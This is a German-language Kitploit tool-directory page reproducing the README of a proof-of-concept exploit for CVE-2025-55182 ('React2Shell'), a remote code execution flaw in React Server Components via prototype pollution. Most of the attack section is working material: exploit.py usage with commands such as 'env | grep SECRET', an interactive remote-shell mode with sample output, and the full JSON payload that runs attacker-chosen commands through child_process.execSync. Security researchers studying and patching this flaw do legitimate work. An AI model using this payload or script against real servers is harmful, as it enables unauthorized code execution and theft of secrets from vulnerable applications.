Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingPayload-Entwicklung
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Proof-of-Concept-Exploit für CVE-2025-55182 (React2Shell), eine kritische RCE-Schwachstelle in React Server Components über Prototype Pollution. Enthält interaktive und Befehlszeilen-Exploit-Modi.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Proof of Concept

CVE-2025-55182 React

Überblick

Eine praktische Demonstration von CVE-2025-55182 (React2Shell) – einer kritischen RCE-Schwachstelle in React Server Components.

Details zur Schwachstelle

  • CVE-ID: CVE-2025-55182
  • Typ: Remote Code Execution durch Prototype Pollution
  • CVSS: 9.8 (KRITISCH)
  • Betroffen: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

Angriffsvektor

React Server Components deserialisieren FormData unsicher. Speziell präparierte Multipart-Felder lösen Prototype Pollution aus und führen beliebigen Code über child_process.execSync aus.


Schnellstart

root@kitploit:~
npm install
pip3 install requests
npm run dev

Die Anwendung läuft unter: http://localhost:3000


Ausnutzung

Grundlegende Verwendung

root@kitploit:~
python3 exploit.py -c "whoami"

Befehlsbeispiele

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

Interaktiver Modus

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

Funktionsweise

Payload-Struktur

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

Testen

Terminal 1: Server starten

root@kitploit:~
npm run dev

Terminal 2: Exploit ausführen

root@kitploit:~
python3 exploit.py -c "whoami"

Verbose-Modus

root@kitploit:~
python3 exploit.py -c "whoami" -v

Zeigt die vollständige Payload-Struktur und die Serverantwort


Referenzen

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

Von Guaxinim | Cybersicherheitsforschung

Tool herunterladen